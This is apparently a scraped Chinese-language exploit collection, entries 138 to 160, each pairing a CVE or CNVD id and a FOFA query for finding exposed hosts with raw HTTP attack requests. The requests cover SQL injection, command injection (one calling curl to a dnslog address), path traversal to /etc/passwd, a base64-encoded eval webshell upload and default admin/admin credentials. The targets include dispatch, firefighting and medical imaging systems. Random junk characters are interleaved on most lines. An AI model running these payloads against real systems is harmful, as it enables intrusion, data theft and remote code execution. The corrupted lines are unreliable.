6 N) ?+ L) Q2 x( O4 N; zFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
8 `7 ~4 _  y/ P: l$ E) |5 ?GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1: ~& r& h# D1 g; o
Host: x.x.x.x/ o2 `' j  Y+ ^0 c. |1 Z) s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0# A6 c* ?+ s& K6 Y* k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 v) c, N! t8 u0 `( t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- {) u! s  e( K% u3 P( ]Accept-Encoding: gzip, deflate, br' y' w7 p* S# P) `8 o7 t0 b9 h
Connection: close
6 k9 w6 m4 |+ _Upgrade-Insecure-Requests: 1
' }: i8 H9 X7 r6 R" Y
3 j3 U8 _; R$ L2 q! e0 ?  j9 V" P; g( a$ n7 k4 P3 J9 n5 J3 X: u
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
- X. K$ A1 d2 N6 r; zCVE-2024-2622
) j% c% a, J  F) p; g) P9 cFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
7 U% p) e) N+ v  _$ v% S( t0 m* [# F; SGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
+ `9 v! b; P8 \' I; A/ A5 }2 _0 XHost: x.x.x.x
$ @5 E) T3 J4 {4 G& k% bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! D1 j' ?- U+ t& |, s- O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% N: f$ `4 N  E% I0 l2 p0 f3 s" QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 \3 z8 C; _7 @8 x( [8 {& @Accept-Encoding: gzip, deflate, br9 B2 r& n4 G6 y$ l4 R
Connection: close
2 G: J. q) G' zCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk8 m" i/ L2 s2 C
Upgrade-Insecure-Requests: 1
2 F7 z  C6 o/ k6 a) b: F* |* l2 P& s  ]
2 L+ Z5 I+ q, R
' [! [$ ^/ n; N0 s! G3 E140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
: `3 c5 X2 l% h2 P4 ~+ Q5 c6 rCVE-2024-25669 d7 i3 m. Q% _- c7 e
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"0 Q5 Z4 s2 f; f& I. d
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1% Y& B* L3 r6 _* l7 |8 _0 i: v
Host: x.x.x.x
& h, E% K- R: v& j8 x0 i- D, e2 T9 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0- |0 ?# k( F' e- y4 B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( D0 @7 e4 O  i" `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! F" v# z% H/ s6 I8 N9 H. C0 p
Accept-Encoding: gzip, deflate, br
" b2 l) F# }4 B3 vConnection: close
+ I3 C) q( r$ r1 ?: Y$ u" j: e6 X4 oCookie: authcode=h8g9
( U' Z( [' K  x0 A3 TUpgrade-Insecure-Requests: 1
4 |* v+ q# x7 E- g# }- s) v3 o% U/ F6 I+ [# c" o) h0 V
0 \0 [# ?1 }, ~# ~- x
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入8 Q  |4 _8 l8 |. x2 Z
FOFA:body="指挥调度管理平台"
. v7 q  _" }0 }3 C& d- K' {POST /app/ext/ajax_users.php HTTP/1.1
- ^6 Q: ^8 A+ |Host: your-ip. N4 `' F6 S! n+ }
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info$ a* E& |, c4 i6 F$ |8 B4 l
Content-Type: application/x-www-form-urlencoded* B  f" h  i& B0 }4 f
5 `! @5 c2 j0 T% h; ?
2 I4 V4 i. N) q2 o, b9 O
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -! A9 n9 L# {$ f' b( }

! P* N# ?; D5 K. i9 q, G* u8 _2 s. I
$ E( H4 I2 n2 E8 Y: m, v) O! K142. CMSV6车辆监控平台系统中存在弱密码
1 Z$ M+ F% b3 B: I; D( k9 a  ECVE-2024-29666: y1 j* j, Q* T" I' q
FOFA:body="/808gps/"; \5 i/ x3 Z$ r. \! |: d! K/ S
admin/admin: l; I: A% M$ m6 {2 O6 X7 O! i. S" s; ~- @
143. Netis WF2780 v2.1.40144 远程命令执行
, M4 l& t0 [) ICVE-2024-258503 i8 X9 E/ w2 \
FOFA:title='AP setup' && header='netis'% Q: }0 z# w; j" N  V
PAYLOAD4 M! S& u) Y2 O; a3 i0 S0 B
" {  ?4 L  z- Q( k% e
144. D-Link nas_sharing.cgi 命令注入
5 [- _: h. k# L9 K9 G! TFOFA:app="D_Link-DNS-ShareCenter"
/ V4 }1 r2 e/ e' C9 v2 [system参数用于传要执行的命令
4 B3 I$ I9 j) L7 n* I+ fGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1  s' W% Z6 j7 n$ A
Host: x.x.x.x
& r" n4 k4 @# G' n% |! _8 GUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
7 r. f" V8 g: ^( i% u( {$ u5 OConnection: close  x8 s6 ?8 I" d$ j
Accept: */*
; d5 |. u, p" }* _3 KAccept-Language: en* m/ n2 ^: P7 l% S- C7 [* w' T
Accept-Encoding: gzip, R2 d8 P- \2 ^. B8 ^# S% b
) o$ |6 m$ P% I, l. H4 ]7 k) b! q

. U/ Z7 M8 L3 z/ f9 q145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
3 \6 ~$ G0 R! R' }$ }" jCVE-2024-3400
0 Z7 V! J3 ^7 eFOFA:icon_hash="-631559155"% p9 o9 c  B* t. m
GET /global-protect/login.esp HTTP/1.1
7 D2 V' B# n( `9 E6 I: \Host: 192.168.30.112:1005
: m. v0 I, c5 Z1 B1 f/ b; ^; I+ o" y+ @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84' Z' U- K0 W+ y" F) R# s
Connection: close
! V: i% _! U2 O3 o+ a, M* d. JCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
# _/ A$ T1 Z" m. i& WAccept-Encoding: gzip
. }* m3 X# |9 N3 I/ {
8 |" _4 b" L1 B5 D
5 z' I0 z; Z2 s# {+ _4 K7 j- J146. MajorDoMo thumb.php 未授权远程代码执行0 R  C# \4 i7 b6 W+ ?* G; d
CNVD-2024-02175" a( }: Q5 [% k' t  Y
FOFA:app="MajordomoSL"( U1 Y+ l, G  X; F! c! P4 {! a. n
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1' T! G# m% I6 r+ j, z
Host: x.x.x.x
" H# J3 D7 S6 @- I  o' k4 M5 I7 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
6 f( V6 s5 H8 v* I  _8 ?0 {Accept-Charset: utf-87 t# D( F1 P* d4 K. B+ Y1 A, V  h
Accept-Encoding: gzip, deflate
0 u: @* v8 x3 C+ L/ e# {+ j6 zConnection: close6 o2 C7 A6 X" z) M! k2 y
8 w" p; |6 }( n: h

+ P0 y4 B* U) R1 e$ H9 l147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
0 ^$ @, e2 O, n4 s+ X0 `CVE-2024-32399% a$ W7 ^( N7 V' H1 y
FOFA:body="RaidenMAILD", ^- U# G  z) |6 S6 u" Z
GET /webeditor/../../../windows/win.ini HTTP/1.1/ I$ ]' X6 R. g4 F$ `
Host: 127.0.0.1:81+ R' q% @  B4 }9 n+ s/ W
Cache-Control: max-age=0+ e: S0 N4 j0 ]$ x4 M8 _5 B
Connection: close
# N, X! F! p* f  h. @4 ?: G! ^1 P4 T/ I

8 p, ~' p5 A& k148. CrushFTP 认证绕过模板注入- f# m+ J- j# s, t) m9 }5 I
CVE-2024-4040
) }/ i8 W. Z. l! q/ eFOFA:body="CrushFTP"
: m( R% H/ }8 R- J' S% Y+ S4 ^PAYLOAD
: v, K4 `5 j" \0 A% w0 v( H; e1 Q' h" o0 g! W& |6 C" l
149. AJ-Report开源数据大屏存在远程命令执行
% E3 A, c: \4 f, x) P# oFOFA:title="AJ-Report"  ]" N4 G3 @$ h# v
& [& D$ L3 U+ j: t# G
POST /dataSetParam/verification;swagger-ui/ HTTP/1.18 }" y1 c# Q8 c2 s' R
Host: x.x.x.x* S* w2 g2 p$ z! G/ v, M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* r' I8 C9 `/ w4 M! A& U1 |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% C4 X( K0 O+ F. d; G# I2 t
Accept-Encoding: gzip, deflate, br
) F! O  n: h6 m7 {) S; r/ iAccept-Language: zh-CN,zh;q=0.9& L3 `3 |% F9 I" l( L
Content-Type: application/json;charset=UTF-8
2 U6 C, l) I: Q* a+ Y, v9 gConnection: close
; `" d* H9 N, i0 J1 C2 D: v  A# ^( z0 m, a& Y
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
& R& D4 R5 Y4 O0 h6 s* x* |# G& z. _6 Z& E' V( n) H+ {
150. AJ-Report 1.4.0 认证绕过与远程代码执行
5 G* y" d1 Z/ ~) ~0 O/ Z" ~, pFOFA:title="AJ-Report"
. m$ x  z9 s/ }3 _: oPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1( k5 H0 o+ i2 W# ~. R1 [
Host: x.x.x.x& c4 k* E1 g7 J7 ]& ~$ h+ z6 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
: u( [4 g! p% K2 I2 f- V; KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' B. \1 f6 S7 c; |  D3 @; _  H
Accept-Encoding: gzip, deflate, br& I9 t  Z1 n* D3 L4 E
Accept-Language: zh-CN,zh;q=0.9
1 `0 @8 x% ]7 x6 P2 Z5 jContent-Type: application/json;charset=UTF-8
5 u% h; D+ O( \& BConnection: close
1 I2 U: ~+ R+ t$ h3 dContent-Length: 339
9 X$ X- d5 f1 y0 Q& l7 a
* z/ t0 `1 j& C{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}& a. `) _* Z5 z2 t

1 U# Q7 w8 b* ~" V( G1 K/ y! C
0 k0 ~* v8 x$ L7 H5 F151. AJ-Report 1.4.1 pageList sql注入
! Z4 Q. i9 L+ O/ X; KFOFA:title="AJ-Report") f, Q) d: \0 N- B
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
$ p6 |1 B" q+ O/ ?1 |Host: x.x.x.x- l9 i. ?. x. j% W. D! a5 }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 Z# v4 p& g' X* i- t  f; Q& l
Connection: close' g; g. ^1 I  Q+ s0 C% s  B
Accept-Encoding: gzip5 b. n8 e$ G3 A) P' I: R6 s
( ^' c* W+ r! P9 [5 n

. H0 S+ T9 ?( G7 z- L7 N4 w152. Progress Kemp LoadMaster 远程命令执行
0 R! D8 F( k3 q4 Y% A/ ~# LCVE-2024-1212
5 C; w$ U" _" c+ ?! Y- f) H( dLoadMaster <= 7.2.59.2 (GA)2 z& f* ~  C5 }
LoadMaster<=7.2.54.8 (LTSF)5 m+ D& j: @. y
LoadMaster <= 7.2.48.10 (LTS)* _( w8 x! a' j& o# D
FOFA:body="LoadMaster"% a( C" V3 I0 s0 ]0 i3 a3 A. y1 _
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码( h: D, ^6 B$ Q$ G6 V
GET /access/set?param=enableapi&value=1 HTTP/1.1: R- ~  h1 \9 D, Q+ F9 h% g
Host: x.x.x.x5 a5 U" t% X7 B( ?( b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
5 ^: c% l( V1 d( q9 b/ P/ n8 tConnection: close
; n3 R: F( G5 a3 U9 AAccept: */*
; A' g1 B) e2 ?# J! pAccept-Language: en& K0 v7 i7 X( d5 ]* T! n5 f
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=2 I" y0 U- L& C, g5 m
Accept-Encoding: gzip0 H; q" }! i% \" |3 H

+ j- s% m" q5 e# D2 T8 P
! M" N0 q/ r0 c5 o5 s153. gradio任意文件读取
  F8 @5 C$ u' L+ R  dCVE-2024-1561FOFA:body="__gradio_mode__"
/ G% X1 Y5 p# ^/ f: F第一步,请求/config文件获取componets的id
! e& f$ Z- ]+ i8 ~http://x.x.x.x/config* K: Z' ^0 j# D; M' q2 P! F
5 _" l; ~3 W" g: p

; p6 Y9 H' s2 L$ h6 h+ D- [第二步,将/etc/passwd的内容写入到一个临时文件0 X" U8 i# o4 c
POST /component_server HTTP/1.1+ C0 C0 D. _4 j
Host: x.x.x.x
% r8 N' T! F; [7 T* GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.34 m6 T  o! R0 @8 q
Connection: close7 {! l9 A5 Y% [' q! C) o
Content-Length: 115& U% ~( L! B0 ~
Content-Type: application/json
6 X7 d, v8 T1 \8 C" UAccept-Encoding: gzip( M3 m/ ~( o# u* l/ _
1 y  I2 S  X" j5 K3 w
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
4 x6 j0 r$ G4 X, f+ b# W% M' w9 G3 L) c, X  R

& v- Y) e; j/ V5 o1 S* G3 L% x第三步访问- m% c- y9 W; x# q& l3 ^# R
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd1 F& j4 l8 C3 z+ v0 O. l# @

4 T4 u- g. Y$ [7 U' U8 G
/ z+ @  P4 ]5 d( |6 D9 D154. 天维尔消防救援作战调度平台 SQL注入; A$ ^; s" O6 l5 ~+ c4 Z
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"  x9 s) V9 l# I: q9 h
POST /twms-service-mfs/mfsNotice/page HTTP/1.1; V' f# O$ J# g! q9 s) \2 y# N) ?
Host: x.x.x.x" m9 y5 j3 d# L
Content-Length: 106
1 Q, [8 n7 Q2 a3 O3 r" b0 {Cache-Control: max-age=0  }! n/ B- G0 H/ S6 |4 w2 i, w
Upgrade-Insecure-Requests: 1
; o( T& s: _; EOrigin: http://x.x.x.x4 `. f. N* e! O0 b3 k2 w9 W9 y
Content-Type: application/json
2 ~; _8 V; |* ~2 R; u" I& b: fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36) v5 m' s1 n0 W; s5 s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! ~5 u$ y+ B7 g2 D6 j1 m( i! k! n! d+ \Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page/ i6 }+ U6 N& r! P/ P
Accept-Encoding: gzip, deflate
6 }3 T, I# C" L, `1 H1 _$ kAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.73 _$ p1 C6 ^, T8 ~2 x! a
Connection: close& [8 F4 n; ^$ x4 t
+ ~" M. ~  V$ K4 K* J0 o+ L# \7 Z+ i
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
- |7 Z6 [1 w9 q* Y6 G8 g2 Y
: \( u' r( N7 N4 x+ J1 y4 V  s4 X+ t0 O, C$ F0 {, B8 K* K' x
155. 六零导航页 file.php 任意文件上传
& ?, F+ p+ I7 a( H- A3 ]CVE-2024-34982
/ a4 Y$ C5 k+ M( w" \FOFA:title=="上网导航 - LyLme Spage"
, Q  O. A+ |% P4 x# f' B7 DPOST /include/file.php HTTP/1.1
& N: W/ U+ i) U9 zHost: x.x.x.x, j* L: y3 ]; J9 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
2 J( W* B3 C$ eConnection: close2 \7 U; L! l: N, Y. V' u
Content-Length: 232
) ^( J+ R, w. P+ S; c' oAccept: application/json, text/javascript, */*; q=0.01
& z! k: D4 A0 O( P" vAccept-Encoding: gzip, deflate, br
$ J! q8 f" T7 s, U- uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 N+ P5 `3 }  @$ J
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
7 [' k; c& O. Q. DX-Requested-With: XMLHttpRequest
2 M0 t+ h( M7 @* k  A% p- W6 _; D' a# B2 Y
-----------------------------qttl7vemrsold314zg0f4 A: F* u* B4 Q7 p/ ^' d
Content-Disposition: form-data; name="file"; filename="test.php"
2 M* \$ T" P# n9 r& p6 @% FContent-Type: image/png6 d3 K0 ^9 H# h; l5 e. I: g

& C& b+ m* w: P  s4 z6 \7 n: `<?php phpinfo();unlink(__FILE__);?>
' @3 `1 B) G1 R$ F, L9 Y: Q-----------------------------qttl7vemrsold314zg0f--. O, A6 m- M; N% I7 e1 z

6 I- z& u; Y, C& l0 O" j; [9 h4 G' z. p( F1 [" `& g; j7 J3 Y
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php( h- u5 k8 K1 R% r

+ j& Y0 }) R+ c3 H$ F1 ~6 ^& w156. TBK DVR-4104/DVR-4216 操作系统命令注入
/ M  w1 k, P; m/ ?) ~; V+ ]1 BCVE-2024-3721
, s4 o4 ]4 r1 b: vFOFA:"Location: /login.rsp"
6 U) q; v8 ^3 H+ i, q) R  t·TBK DVR-4104
- n8 }6 D+ h9 l& w! K·TBK DVR-4216$ C+ ?! |3 r. Y# |" i( }+ H
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1": R$ s" [% S+ a; V( V! v- h

3 [& o. Q5 S; U, O, p7 ^4 S" B. M- w
2 S, Z" w: V+ E. N7 y" _5 dPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
, p+ W" k. }: A; H5 sHost: x.x.x.x/ f  [* J- o7 m! l' _( a. z1 D( W" s0 f: m
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. i8 A! Z* m& O; F' ~1 M* dConnection: close) @/ S: w. G* O- r: i/ X
Content-Length: 0
0 q2 p* q& e, }* s8 K% z, FCookie: uid=1
) Z! a4 K0 ?5 T$ \. y8 Q* PAccept-Encoding: gzip
0 R* j$ k. v6 W7 m) B  G" E( \/ E+ r" U0 J% A: Q+ _- e

0 v6 p& g& f4 H5 [4 t; U/ n; T157. 美特CRM upload.jsp 任意文件上传* G% B, t1 o, a% G  [# Q+ r. A
CNVD-2023-06971
; {. Z$ J+ Z9 `7 |6 jFOFA:body="/common/scripts/basic.js"" j3 |- c  ~/ _* }2 j4 [6 D2 q7 R
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.10 I2 W% Q& r/ f, c% e* r9 Q
Host: x.x.x.x
! y& A) x6 }2 |6 d+ E6 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
  {3 d5 J) r6 U1 ^. DContent-Length: 709
3 j; d- o9 G5 S* j6 m0 w) uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, R3 G/ j7 \3 Y7 P* d
Accept-Encoding: gzip, deflate
. |4 N2 u( K# pAccept-Language: zh-CN,zh;q=0.9
" Z5 e- ?( a# L7 s( a( Z& jCache-Control: max-age=06 l7 a. e  g& H  {
Connection: close# I; x( |8 {# E4 Z" D& k: b2 N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN- R& m8 w* m2 y- V" e% k1 k
Upgrade-Insecure-Requests: 1" u4 F( H3 i+ l- T; o

: ^5 }4 Q! D( M+ b+ ]8 C------WebKitFormBoundary1imovELzPsfzp5dN
" B! b& v' A7 h: JContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"$ h; l: u' r0 `: l9 O
Content-Type: application/octet-stream9 A5 Y) y: w( c: l7 j
& [7 b! Q9 }) l) P1 ^5 _
nyhelxrutzwhrsvsrafb7 R0 X$ C7 j4 l: i7 X" a- ^4 C
------WebKitFormBoundary1imovELzPsfzp5dN
8 v0 M: G" c1 w* Z3 PContent-Disposition: form-data; name="key"1 a$ @4 m3 |- Y
" I- D/ i/ `  Y3 }4 I. Q, i, o% x
null
$ p( z# a/ |5 K& r5 U7 y------WebKitFormBoundary1imovELzPsfzp5dN
# W1 e# R3 a# q& NContent-Disposition: form-data; name="form", F4 _0 k! d/ k- s
* C  A9 N% s( ]
null
' O( B1 z# {" R------WebKitFormBoundary1imovELzPsfzp5dN* v# Y% P; J, |/ ?' B. _- }6 e
Content-Disposition: form-data; name="field"
5 G; a- H, p& _( y" V2 r( v% C& p1 L- M, J
null" r$ v  O) F4 p
------WebKitFormBoundary1imovELzPsfzp5dN
) d! _1 a' W/ UContent-Disposition: form-data; name="filetitile"
( E: _# ^% e% c: Q: K: ^2 Z3 B) z& L, ^6 {% O+ b
null
7 g3 `% N# m+ f! u. y6 e------WebKitFormBoundary1imovELzPsfzp5dN7 k1 }$ E7 K* Q1 U6 l
Content-Disposition: form-data; name="filefolder"
/ {# G3 r: N' W5 l! z* J( @  r9 G+ t2 J/ `! @& d
null# P0 }+ E5 X4 N' N5 U5 v  K
------WebKitFormBoundary1imovELzPsfzp5dN--
8 C+ j3 F* X2 I9 o$ [  `' T2 M1 \. `' Q" ~9 }7 ~+ T' p2 ~6 P3 c

. p  A& d. C' ?4 Ohttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp+ R8 r' T' g1 H3 w" n/ s# R

) ?+ z! i/ s' @+ j3 L3 _/ W158. Mura-CMS-processAsyncObject存在SQL注入6 n2 h+ r  j: K+ i# J, b3 Z5 M
CVE-2024-32640
* I4 ?" a9 o. X+ I  PFOFA:"Generator: Masa CMS"1 D; a2 s/ B8 t$ N
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
- p/ p9 N+ S% C. W# MHost: {{Hostname}}) }9 e/ g+ J5 X- L( o8 L* R* z
Content-Type: application/x-www-form-urlencoded2 Y3 Y% C5 f) A: e" P$ V

" v2 J: m' b' I8 Pobject=displayregion&contenthistid=x\'&previewid=1
- o  v- G& Y2 \- n7 j* F  f* ~- n6 b/ M4 ]$ v

4 S3 R9 Q( ^- @0 y$ J. c159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传9 ]! _9 q, ^" J3 B7 x2 P' U$ [, A
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
" `: B7 J: ~) }) S% XPOST /webservices/WebJobUpload.asmx HTTP/1.1
; ~" ^( O+ i* O+ p0 U8 q  NHost: x.x.x.x
( y0 d. T$ v. `3 ?9 a* qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
7 C) [% P7 V5 j0 u3 D0 @; y7 J* uContent-Length: 1080
" H5 Z9 }  H6 f; WAccept-Encoding: gzip, deflate/ H- i0 ]  j% K( d& I: J
Connection: close
$ |0 ^  M5 T7 t: u3 {8 L$ w7 b: IContent-Type: text/xml; charset=utf-8
8 y3 m; O2 X) t+ Q8 R9 oSoapaction: "http://rainier/jobUpload"
7 e& F3 t9 s1 o0 D1 h* e9 v
  x2 ^) m/ L, ~- t: [<?xml version="1.0" encoding="utf-8"?>) M) Q6 V4 ^6 V- q" y) X9 N) D& w
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">% s, ^2 O2 ^8 z) p: l
<soap:Body>
; p  R9 c- C2 t5 J9 r: q<jobUpload xmlns="http://rainier">
( h$ g3 M) P- {* }<vcode>1</vcode>3 O% @5 \- T& H3 z) w) B
<subFolder></subFolder>
3 P& a0 t& Y, o* m0 D3 j; `<fileName>abcrce.asmx</fileName>
9 [) u; ^( r/ o  R6 o& A, a<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
* s6 T2 G; F" `( G3 f8 O</jobUpload>
, A& E2 m8 E$ O+ F5 o5 P# V* ~+ _</soap:Body>) H, z# V- w3 z/ Z- h# M
</soap:Envelope>& `) C* ]; W* _9 V5 ^
4 i' u8 d* K& H! b& r  \) ?9 U' n

0 U1 [6 }9 i' F/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")* Y( q, X' c* H9 ^& n

' L3 j/ Q7 G6 {% h/ i6 w1 c6 ^& X( X% l
160. Sonatype Nexus Repository 3目录遍历与文件读取# ~6 H" b* m- V# v
CVE-2024-4956% ^0 f: l  x2 g; Z$ h1 @
FOFA:title="Nexus Repository Manager"# l4 ^/ l% U* |. c
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.10 e+ s$ V1 T% k
Host: x.x.x.x/ D' W7 H) I" l4 {
